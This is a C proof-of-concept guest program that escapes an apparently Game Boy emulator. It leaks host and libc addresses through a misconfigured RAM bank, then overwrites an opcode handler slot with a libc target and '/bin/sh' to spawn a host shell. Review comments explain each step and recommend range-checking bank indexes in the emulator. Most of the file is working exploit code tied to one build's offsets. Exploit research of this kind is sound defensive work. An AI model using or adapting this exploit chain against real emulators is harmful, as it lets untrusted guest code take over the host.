#include "stdint.h"
#include "string.h"
/*
 * Guest-side proof-of-concept that runs inside an emulated machine and
 * reads and writes the emulator's host-process memory through guest addresses.
 * The `__asm ... __endasm` block is SDCC-style inline assembly; the _gb
 * suffixes and the WRAM/LCD-RAM bank comments suggest a Game Boy emulator,
 * but the emulator is not named in this file.
 *
 * What the visible code does, in order:
 *   1. reads a 64-bit value at guest address 0xD960 and treats it as a host
 *      code pointer, from which it derives the emulator's load base;
 *   2. writes a host address (base + 0x4ad78, named free_got) into a 64-bit
 *      field at memory_gb + 0x90;
 *   3. reads a 64-bit value at guest address 0x8000 and derives a libc base
 *      from it;
 *   4. overwrites the bytes at processor_gb with "/bin/sh" and stores
 *      libc + 0x52290 at processor_gb + 0x100;
 *   5. executes the `stop` instruction.
 *
 * NOTE(review): every numeric offset is specific to one emulator/libc build
 * and, per the author's comment, to a fresh container session; none of them
 * can be verified from this file.
 *
 * NOTE(review), defensive reading: the author's "WRAM BANK = -0x13" comment
 * implies the emulator accepted an out-of-range (negative) bank index, which
 * is what makes host structures addressable from the guest. The fix belongs
 * in the emulator: range-check bank selection so that no guest address can
 * resolve outside guest RAM. Running the emulator under a sandbox that
 * denies process execution limits the impact of this class of bug.
 */
void
main(void)
{
/* volatile static: presumably keeps the compiler from reordering or eliding
 * these accesses and keeps the values off the stack -- TODO confirm. */
volatile static uint8_t *processor_gb;
volatile static uint8_t *memory_gb;
volatile static uint8_t *free_got_gb;
volatile static uint64_t op0x00;
volatile static uint64_t base;
volatile static uint64_t libc;
volatile static uint64_t free_got;
volatile static uint64_t target;
/* NEEDS TO BE FIRST SESSION OF CONTAINER! */
/* (presumably because the guest-to-host distances below depend on the
 * emulator's heap layout at startup -- TODO confirm) */
/* processor - wrambanks = -0x126a0 */
/* WRAM BANK = -0x13 */
/* Guest address at which, given the bank setup noted above, the host-side
 * "processor" structure is expected to appear; memory_gb is 0xd0 bytes
 * before it. */
processor_gb = (void*) 0xD960;
memory_gb = processor_gb - 0xd0;
/* get base from op0x00 */
/* The first 8 bytes at processor_gb are read as a host pointer (named
 * op0x00, presumably the handler for opcode 0x00) and a fixed offset is
 * subtracted to obtain the image base; this is an address leak. */
op0x00 = *(uint64_t*)processor_gb;
base = op0x00 - 0x1d420;
free_got = base + 0x4ad78;
/* change lcdrambank pointer to access got */
/* After this store, guest address 0x8000 is read below as if it aliased the
 * host address written here. */
*(uint64_t*)(memory_gb+0x90) = free_got;
free_got_gb = (void*) 0x8000;
/* The 8 bytes read here are treated as a resolved libc pointer; subtracting
 * a fixed offset gives the libc base. */
libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;
/* Address inside libc; which symbol it is cannot be told from this file. */
target = libc + 0x52290;
/* Overwrites the start of the structure at processor_gb (including the
 * pointer read earlier) with the string "/bin/sh". */
strcpy((char*)processor_gb, "/bin/sh");
/* Stores target at offset 0x10*0x10 = 0x100 from processor_gb. Presumably
 * this is the table slot for opcode 0x10 with a 0x10-byte stride -- TODO
 * confirm against the emulator source. */
*(uint64_t*)(processor_gb+0x10*0x10) = target;
/* Executes the guest `stop` instruction; presumably this makes the emulator
 * dispatch through the slot overwritten above. */
__asm \
stop \
__endasm;
/* Spin forever if execution ever continues past the stop instruction. */
while (1);
}